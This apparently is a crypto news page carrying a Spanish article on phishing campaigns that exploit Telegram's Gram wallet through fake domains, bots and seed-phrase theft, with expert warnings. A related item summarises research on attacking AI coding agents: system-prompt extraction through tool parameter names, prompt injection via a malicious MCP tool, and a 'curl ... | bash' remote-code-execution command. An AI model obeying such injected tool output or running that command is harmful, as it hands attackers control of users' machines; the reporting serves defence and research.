Gram sin dudas: estafadores desarrollaron un esquema con nuevo servicio en Telegram

cryptonews.ruXuất bản vào 2026-08-07Cập nhật gần nhất vào 2026-08-07

Tóm tắt

Estafadores están explotando las noticias sobre Telegram y Pavel Durov para lanzar nuevas campañas de phishing relacionadas con la criptomoneda Gram. Utilizan el miedo de los usuarios y promesas de ganancias fáciles, creando sitios web y bots de Telegram falsos que imitan el estilo oficial de la plataforma. Los ciberdelincuentes registran masivamente dominios que mencionan Telegram, Durov o Gram, y ofrecen servicios fraudulentos que prometen ayudar a los usuarios a "salvar" sus activos ante una supuesta futura bloqueo, intercambiar tokens antiguos o recibir criptomonedas gratuitas. Su principal herramienta es crear una sensación de urgencia y exclusividad. El método consiste en engañar a las personas para que, voluntariamente, proporcionen acceso a sus carteras cripto o ingresen sus frases semilla (seed phrases) en sitios falsos. Las campañas son cada vez más sofisticadas, construyendo cadenas de confianza que guían a la víctima desde los resultados de búsqueda hasta canales, bots y finalmente páginas de phishing. Los expertos advierten que ni Telegram ni sus servicios oficiales realizan sorteos de criptomonedas o conversiones a través de sitios o bots de terceros. La principal vulnerabilidad explotada es la psicología humana. La recomendación clave es mantener la precaución: no hacer clic en enlaces sospechosos, nunca introducir datos confidenciales en sitios no oficiales y utilizar únicamente los servicios verificados de Telegram para gestionar las carteras.

Los estafadores comenzaron a utilizar activamente las noticias sobre Telegram y Pavel Durov (incluido en la lista de terroristas y extremistas en la RF) para difundir nuevos esquemas de phishing relacionados con la criptomoneda Gram. Se les ofrece a los usuarios intercambiar urgentemente tokens antiguos, retirar fondos antes de la supuesta futura bloqueo del mensajero o recibir criptomonedas gratuitas a través de servicios especiales. Según expertos, los delincuentes crean sitios web falsos y bots de Telegram, diseñados en el estilo oficial de la plataforma. Las principales herramientas de influencia son el miedo a perder fondos y la promesa de ganancias fáciles.

Servicios falsos de Telegram

Tras la aparición de noticias sobre Telegram, los especialistas en ciberseguridad registraron un fuerte aumento de actividad sospechosa. Según ellos, los delincuentes comenzaron a registrar masivamente dominios que mencionan Telegram, Pavel Durov y la criptomoneda Gram —el token nativo de la cadena de bloques TON—, así como a lanzar servicios falsos que prometen a los usuarios mantener el acceso a sus activos o ganar rápidamente con la nueva "moneda".

— Después del 30 de julio, los analistas de SBA registran un aumento de la actividad de registro alrededor de Telegram. En seis días, la cantidad de nuevos dominios que mencionan Telegram o Durov creció aproximadamente un 18%. Mientras tanto, el número de dominios con potenciales signos de phishing se duplicó. Es especialmente notable el registro masivo el 3 de agosto de 11 dominios idénticos que se hacen pasar por servicios de verificación y protección de Telegram —comentó a Izvestia el director del servicio Smart Business Alert de la empresa ESA PRO, Serguéi Trujachev.

Según sus palabras, los estafadores explotan activamente las preocupaciones de los usuarios relacionadas con el futuro de Telegram. Se convence a las personas de que los servicios afiliados al fundador del mensajero pronto supuestamente dejarán de estar disponibles, por lo que es necesario transferir fondos lo más rápido posible o utilizar un nuevo servicio de criptomonedas.

Los criminales prácticamente de inmediato comenzaron a utilizar el tema informativo para crear nuevas leyendas, señaló el director del centro de lucha contra el fraude de la empresa "Informzashchita", Pável Kovalenko. Según él, a los delincuentes les abrieron oportunidades adicionales el lanzamiento de la billetera integrada no custodiada Gram. Los usuarios aún no han tenido tiempo de entender la nueva función, lo que los estafadores aprovechan activamente, haciendo pasar servicios falsos por herramientas oficiales de Telegram.

Una evaluación similar dio el director del grupo de investigación de Positive Technologies, Fiódor Chunizhekov. Señaló que los eventos de gran repercusión tradicionalmente se convierten en la base para nuevos escenarios de ingeniería social.

— Se le informa al usuario que es necesario "confirmar urgentemente la cuenta", "retirar activos antes del bloqueo", "intercambiar monedas antiguas", "recibir tokens gratuitos" o "registrarse en el nuevo servicio antes que los demás". Precisamente la sensación de urgencia, la promesa de ganancias gratuitas y la exclusividad de la oferta se convierten en las principales herramientas de manipulación y presión psicológica —explicó.

Enfoques sistemáticos de los estafadores

La tarea principal de los estafadores es convencer a la persona de que proporcione por sí misma acceso a su billetera de criptomonedas. Después de hacer clic en el enlace, se le pide al usuario que se autorice a través de Telegram, ingrese la frase semilla o confirme una transacción, tras lo cual los activos pasan irrevocablemente a los delincuentes, relató Pável Kovalenko.

En esencia, los criminales apuestan no a hackear tecnologías, sino a la presión psicológica, añadió el presidente del consejo de lucha contra infracciones tecnológicas del KS NSB de Rusia, fundador de la empresa "Internet-Rozyск", Ígor Béderov.

Los estafadores no hackean complejos protocolos de blockchain, hackean la credulidad y la ansia de "gratis" en medio de titulares de pánico. Además, la cantidad de registros de dominios de phishing con las palabras gram, wallet, convert y gift en combinación con Telegram ha crecido decenas de veces —subrayó el experto.

Al mismo tiempo, las campañas fraudulentas se vuelven cada vez más complejas. Hoy en día los delincuentes construyen cadenas completas de confianza, trasladando secuencialmente al usuario desde los resultados de búsqueda a un canal de Telegram, luego a un bot y a un sitio web falso, relató el presidente de la comisión de ROTSIT sobre tecnologías en la nube, hosting y seguridad de la información, Mijaíl Shuryguin.

— Se puede hablar de una transición del envío primitivo de enlaces maliciosos a la creación de toda una "ecosistema de falsa confianza" —señaló.

El diseño de calidad, la presencia de reseñas, servicio de atención al cliente e incluso conexión segura ya no se consideran signos de confiabilidad de un recurso. Es importante que los usuarios recuerden que Telegram y sus servicios oficiales no realizan distribuciones de criptomonedas ni conversiones de tokens a través de sitios web o bots de terceros, recordó el experto.

Los delincuentes también utilizan activamente páginas de phishing y criptodrenadores —programas maliciosos que inducen a los usuarios a conectar por sí mismos billeteras de criptomonedas a sitios falsos o ingresar credenciales de acceso a Telegram con el pretexto de recibir tokens gratuitos y otras bonificaciones, añadió la analista principal del departamento de protección contra riesgos digitales de la empresa F6, María Sinitsyna.

— La principal vulnerabilidad en el 99% de estos ataques se encuentra en la intersección de la tecnología y la psicología humana —señaló Ígor Béderov.

Los expertos consultados coinciden en que la principal protección de los activos digitales sigue siendo la precaución. Recomiendan no hacer clic en enlaces publicitarios, no ingresar frases semilla y códigos de confirmación en recursos de terceros, y utilizar solo los servicios oficiales de Telegram al trabajar con billeteras de criptomonedas.

end-content

Tiền kỹ thuật số thịnh hành

Câu hỏi Liên quan

Q¿Cuál es la nueva táctica que están utilizando los estafadores relacionada con Telegram y la criptomoneda Gram?

ALos estafadores están utilizando noticias sobre Telegram y Pável Dúrov para difundir nuevos esquemas de phishing. Crean sitios web y bots falsos con el estilo oficial de la plataforma, ofreciendo intercambiar tokens antiguos, retirar fondos antes de una supuesta futura suspensión del servicio u obtener criptomonedas gratis.

Q¿Qué informó el experto Serguéi Trujachev sobre el registro de dominios tras las noticias de Telegram?

ASerguéi Trujachev informó que, tras el 30 de julio, se ha detectado un aumento en el registro de dominios que mencionan Telegram o Dúrov (aproximadamente un 18% en seis días). El número de dominios con posibles señales de phishing se ha duplicado, destacando el registro masivo el 3 de agosto de 11 dominios que se hacen pasar por servicios de verificación y protección de Telegram.

Q¿Cuál es el principal objetivo de los estafadores según los expertos citados en el artículo?

AEl principal objetivo de los estafadores es convencer a los usuarios para que revelen voluntariamente el acceso a sus billeteras de criptomonedas. Para ello, usan el miedo a perder fondos, promesas de ganancias fáciles y un sentido de urgencia, llevando a las víctimas a autorizarse a través de Telegram, introducir su frase semilla (seed phrase) o confirmar transacciones fraudulentas.

Q¿Por qué el lanzamiento del monedero no custodio Gram en Telegram facilita el trabajo de los estafadores?

AEl lanzamiento del monedero Gram facilita el trabajo de los estafadores porque los usuarios aún no están familiarizados con esta nueva función. Los delincuentes aprovechan esta falta de conocimiento para presentar servicios falsos como herramientas oficiales de Telegram, engañando a la gente más fácilmente.

Q¿Qué consejo principal dan los expertos para protegerse de estos fraudes?

ALos expertos aconsejan ser muy cautelosos: no hacer clic en enlaces publicitarios sospechosos, no introducir frases semilla o códigos de confirmación en sitios web de terceros, y utilizar únicamente los servicios oficiales de Telegram cuando se trabaje con billeteras de criptomonedas. También recuerdan que Telegram no realiza repartos de criptomonedas ni conversiones de tokens a través de sitios o bots externos.

Nội dung Liên quan

Kho dự trữ Bitcoin của Strategy thu lợi nhuận $1 tỷ nhờ giá Bitcoin tăng

Kho dự trữ bitcoin của công ty MicroStrategy do Michael Saylor đứng đầu đã thoát khỏi tình trạng lỗ nhờ đà tăng giá của tiền mã hóa. Lợi nhuận chưa thực hiện từ khoản đầu tư này đã vượt quá 1 tỷ USD. Vào ngày 21 tháng 8, giá Bitcoin ($BTC) lần đầu tiên tăng vọt trên 76.000 USD kể từ cuối tháng Năm, với mức tăng 21% trong tuần. Tính đến 10:45 giờ Moscow, Bitcoin được giao dịch quanh mức 76.700 USD. MicroStrategy sở hữu 840.447 BTC với giá mua trung bình là 75.385 USD. Từ năm 2020, công ty đã chi 63,36 tỷ USD để tích lũy số bitcoin này. Với giá hiện tại, tổng giá trị kho dự trữ đã đạt 64,46 tỷ USD, vượt quá chi phí đầu tư khoảng 1,1 tỷ USD. Sự thay đổi mạnh mẽ này diễn ra chưa đầy một tháng sau khi MicroStrategy báo cáo khoản lỗ 8,2 tỷ USD trong quý II, chủ yếu do tổn thất chưa thực hiện từ khoản đầu tư vào Bitcoin (khi đó giá vào khoảng 60.000 USD cuối tháng Sáu). Để duy trì ổn định tài chính, công ty đã phải bán một phần bitcoin và tăng cường dự trữ USD. Tuy nhiên, đầu tháng Tám, CEO Phong Le tuyên bố công ty sẽ tiếp tục tích lũy tiền mã hóa vào cuối năm nay.

cryptonews.ru7 phút trước

Kho dự trữ Bitcoin của Strategy thu lợi nhuận $1 tỷ nhờ giá Bitcoin tăng

cryptonews.ru7 phút trước

RWA Token hóa bước sang giai đoạn tiếp theo: Lợi thế thực sự cần thời gian để xây dựng là gì?

Khung phát hành token hóa tài sản thực (RWA) đang ngày càng trưởng thành, giúp việc đưa tài sản lên chuỗi trở nên nhanh chóng hơn. Tuy nhiên, khi rào cản về "phát hành" giảm xuống, câu hỏi quan trọng hơn là: điều gì sẽ xảy ra sau khi phát hành? Lợi thế cạnh tranh lâu dài không chỉ nằm ở loại tài sản được token hóa, mà còn ở khả năng vận hành bền vững và hồ sơ theo dõi được tích lũy theo thời gian. Bài viết nêu bật khái niệm "Lớp Dự trữ" (Reserve Layer) – cơ sở hạ tầng kết nối tài sản thực chất lượng cao với các hệ thống xác minh, thanh khoản và vận hành cần thiết trên chuỗi. Không phải mọi tài sản đều phù hợp làm tài sản dự trữ. Các tài sản như trái phiếu kho bạc Mỹ ngắn hạn, vàng vật chất có tính xác định giá trị cao, thị trường sâu và tiêu chuẩn hóa tốt. Ngược lại, các tài sản như tín dụng tư nhân phức tạp hơn do tính không đồng nhất. Lợi thế thực sự khó sao chép là hồ sơ vận hành lâu dài được xây dựng thông qua việc thực thi nhất quán: kiểm toán dự trữ độc lập định kỳ, cơ chế mua lại đã được chứng minh, duy trì tính liên tục thị trường, mở rộng tích hợp hệ sinh thái và xây dựng tính thanh khoản. Các bằng chứng này tích lũy theo thời gian, tạo niềm tin cho các tổ chức và củng cố vòng tròn tăng cường: hồ sơ vận hành mạnh hơn dẫn đến phân phối rộng hơn, thanh khoản sâu hơn và tiện ích tài sản thế chấp lớn hơn. Chất lượng tài sản cơ bản và năng lực vận hành của bên phát hành là hai trụ cột không thể thiếu cho sự bền vững. Sự kết hợp của tài sản dự trữ chất lượng cao với năng lực vận hành đã được chứng minh sẽ tạo nền tảng vững chắc nhất. Trong khi đó, ngay cả những tài sản chất lượng cao cũng có thể tiềm ẩn rủi ro nếu cơ sở hạ tầng vận hành phía sau chưa được kiểm chứng qua thời gian và các điều kiện thị trường khác nhau. Tóm lại, một thập kỷ sau, những dự án RWA vẫn giữ được niềm tin của thị trường và tiếp tục hoạt động sẽ là những người kết hợp thành công tài sản dự trữ chất lượng cao với kỷ luật vận hành lâu dài, biến chúng thành cơ sở hạ tầng đáng tin cậy cho tài chính trên chuỗi.

marsbit9 phút trước

RWA Token hóa bước sang giai đoạn tiếp theo: Lợi thế thực sự cần thời gian để xây dựng là gì?

marsbit9 phút trước

Artemis: Tại sao chúng tôi lạc quan về Circle?

**Artemis: Tại sao chúng tôi lạc quan về Circle?** Thị trường hiện đang định giá thấp Circle (CRCL) do lo ngại về Open Standard - một liên minh 140+ công ty (gồm Stripe, Visa, Mastercard, Google) phát hành stablecoin OUSD, đe dọa vị thế của USDC. Tuy nhiên, quan điểm của Artemis là thị trường đang nhầm lẫn. Ba luận điểm cốt lõi: 1. **Tăng trưởng ổn định:** Stablecoin dự kiến đạt quy mô **1 nghìn tỷ USD vào năm 2030** (tăng trưởng kép hàng năm ~40%), và đã tách biệt khỏi chu kỳ giá crypto. 2. **Hiệu ứng mạng và tính thanh khoản:** Thị trường có xu hướng "kẻ thắng hưởng tất". USDC và Tether hiện nắm hơn **80% thị phần**, xây dựng rào cản cực kỳ khó vượt qua về thanh khoản xuyên chuỗi và ứng dụng. Các liên minh như Open Standard khó thành công do thiếu động lực và quản trị đồng thuận. 3. **Định giá sai lầm:** Thị trường xem Circle chỉ là "nhà phát hành stablecoin" phụ thuộc vào lãi suất, trong khi thực chất họ đang xây dựng một **nền tảng tiền tệ toàn diện (full-stack money platform)** với các sản phẩm như Mạng Thanh toán Circle (Circle Payments Network - giao dịch tăng 6.8 lần/năm) và blockchain Arc. Khi Circle đa dạng hóa doanh thu từ phí giao dịch và blockchain, định giá (P/S) hiện tại ~6.7x được kỳ vọng mở rộng lên ~10x. Với kịch bản ổn định, doanh thu Circle có thể đạt ~5 tỷ USD vào năm 2030, dẫn đến định giá vốn hóa tiềm năng **~50 tỷ USD**. Mức giá hiện tại sau cú sốc Open Standard có thể đang tạo ra chênh lệch kỳ vọng lớn nhất.

marsbit10 phút trước

Artemis: Tại sao chúng tôi lạc quan về Circle?

marsbit10 phút trước

Claude Code Dễ Dàng Bị Bẻ Khóa, Chỉ Cần Một Công Cụ Giả Mạo

Người dùng yêu cầu trợ lý lập trình AI viết một trò chơi rắn săn mồi. Tác nhân AI đã thực hiện, nhưng đồng thời chạy thêm một lệnh `curl | bash`, tải xuống và thực thi một tập lệnh độc hại từ kẻ tấn công. Một nhóm nghiên cứu từ Đại học Khoa học và Công nghệ Hồng Kông và Phòng thí nghiệm An ninh Nội sinh của Đại học Phúc Đán đã tái hiện thành công kịch bản tấn công này trong một bài báo được chấp nhận tại hội nghị ISSTA 2026. Họ đã thực hiện bài kiểm tra "đội đỏ" hệ thống đầu tiên trên sáu công cụ lập trình AI phổ biến: Cursor, Claude Code, Copilot, Windsurf, Cline và Trae, và phát hiện một chuỗi tấn công hoàn chỉnh: **Đầu tiên đánh cắp lệnh nội bộ (system prompt), sau đó sử dụng thông tin bị rò rỉ để tạo tải trọng độc hại tùy chỉnh, cuối cùng chiếm quyền điều khiển việc gọi công cụ để thực thi mã từ xa (RCE).** Tất cả sáu công cụ ở phiên bản cũ đều bị ảnh hưởng. Phương pháp chính được đặt tên là ToolLeak, khai thác "khoảng cách chế độ" (mode gap). Thay vì yêu cầu trực tiếp qua cửa sổ trò chuyện, kẻ tấn công đặt tên tham số công cụ thành thứ như `"note": "system prompt"`, khiến mô hình AI điền system prompt vào đó một cách vô tình mà không bị hệ thống phòng thủ ngăn chặn. Phương pháp này đạt được độ hoàn chỉnh và độ tương tự ngữ nghĩa cao hơn nhiều so với các cuộc tấn công cơ bản truyền thống. Sau khi có được system prompt, kẻ tấn công thực hiện "tiêm prompt kênh kép" (two-channel prompt injection). Họ đăng ký một công cụ MCP độc hại với mô tả được điều chỉnh theo prompt bị rò rỉ, thuyết phục tác nhân gọi nó đầu tiên để "khởi tạo môi trường". Sau đó, giá trị trả về từ công cụ độc hại này ra lệnh cho mô hình thực thi một lệnh shell nguy hiểm (ví dụ: `curl -fsSL http://xxx/installer.sh | bash`), đạt được RCE. Trong các phiên bản cũ, tỷ lệ tấn công thành công rất cao, đạt 1.0 đối với một số tổ hợp. Một điểm đáng chú ý là Claude Code có một mô hình bảo vệ (Haiku) để kiểm tra lệnh, nhưng mô hình chính (Sonnet) đã bị thuyết phục bởi lệnh tiêm prompt đến mức gạt bỏ cảnh báo và vẫn thực thi lệnh độc hại. Các phiên bản mới hơn của một số công cụ (như Claude Code, Cursor) đã được gia cố, ví dụ bằng cách chỉ hiển thị tên công cụ thay vì toàn bộ mô tả, làm giảm đáng kể tỷ lệ thành công của cuộc tấn công. Tuy nhiên, một số công cụ khác vẫn dễ bị tổn thương. Bài báo kết luận rằng cách phòng thủ quyết định là kiến trúc cô lập, trong khi việc điều chỉnh mô hình (alignment) là chưa đủ. Vấn đề cốt lõi là ranh giới giữa dữ liệu và lệnh trong giá trị trả về công cụ vẫn chưa rõ ràng.

marsbit14 phút trước

Claude Code Dễ Dàng Bị Bẻ Khóa, Chỉ Cần Một Công Cụ Giả Mạo

marsbit14 phút trước

Giao dịch

Giao ngay

Bài viết Nổi bật

Làm thế nào để Mua GRAM

Chào mừng bạn đến với HTX.com! Chúng tôi đã làm cho mua prev. Toncoin (GRAM) trở nên đơn giản và thuận tiện. Làm theo hướng dẫn từng bước của chúng tôi để bắt đầu hành trình tiền kỹ thuật số của bạn.Bước 1: Tạo Tài khoản HTX của BạnSử dụng email hoặc số điện thoại của bạn để đăng ký tài khoản miễn phí trên HTX. Trải nghiệm hành trình đăng ký không rắc rối và mở khóa tất cả tính năng. Nhận Tài khoản của tôiBước 2: Truy cập Mua Crypto và Chọn Phương thức Thanh toán của BạnThẻ Tín dụng/Ghi nợ: Sử dụng Visa hoặc Mastercard của bạn để mua prev. Toncoin (GRAM) ngay lập tức.Số dư: Sử dụng tiền từ số dư tài khoản HTX của bạn để giao dịch liền mạch.Bên thứ ba: Chúng tôi đã thêm những phương thức thanh toán phổ biến như Google Pay và Apple Pay để nâng cao sự tiện lợi.P2P: Giao dịch trực tiếp với người dùng khác trên HTX.Thị trường mua bán phi tập trung (OTC): Chúng tôi cung cấp những dịch vụ được thiết kế riêng và tỷ giá hối đoái cạnh tranh cho nhà giao dịch.Bước 3: Lưu trữ prev. Toncoin (GRAM) của BạnSau khi mua prev. Toncoin (GRAM), lưu trữ trong tài khoản HTX của bạn. Ngoài ra, bạn có thể gửi đi nơi khác qua chuyển khoản blockchain hoặc sử dụng để giao dịch những tiền kỹ thuật số khác.Bước 4: Giao dịch prev. Toncoin (GRAM)Giao dịch prev. Toncoin (GRAM) dễ dàng trên thị trường giao ngay của HTX. Chỉ cần truy cập vào tài khoản của bạn, chọn cặp giao dịch, thực hiện giao dịch và theo dõi trong thời gian thực. Chúng tôi cung cấp trải nghiệm thân thiện với người dùng cho cả người mới bắt đầu và người giao dịch dày dạn kinh nghiệm.

Tổng lượt xem 607Xuất bản vào 2026.06.15Cập nhật vào 2026.08.20

Làm thế nào để Mua GRAM

Thảo luận

Chào mừng đến với Cộng đồng HTX. Tại đây, bạn có thể được thông báo về những phát triển nền tảng mới nhất và có quyền truy cập vào thông tin chuyên sâu về thị trường. Ý kiến ​​của người dùng về giá của GRAM (GRAM) được trình bày dưới đây.

活动图片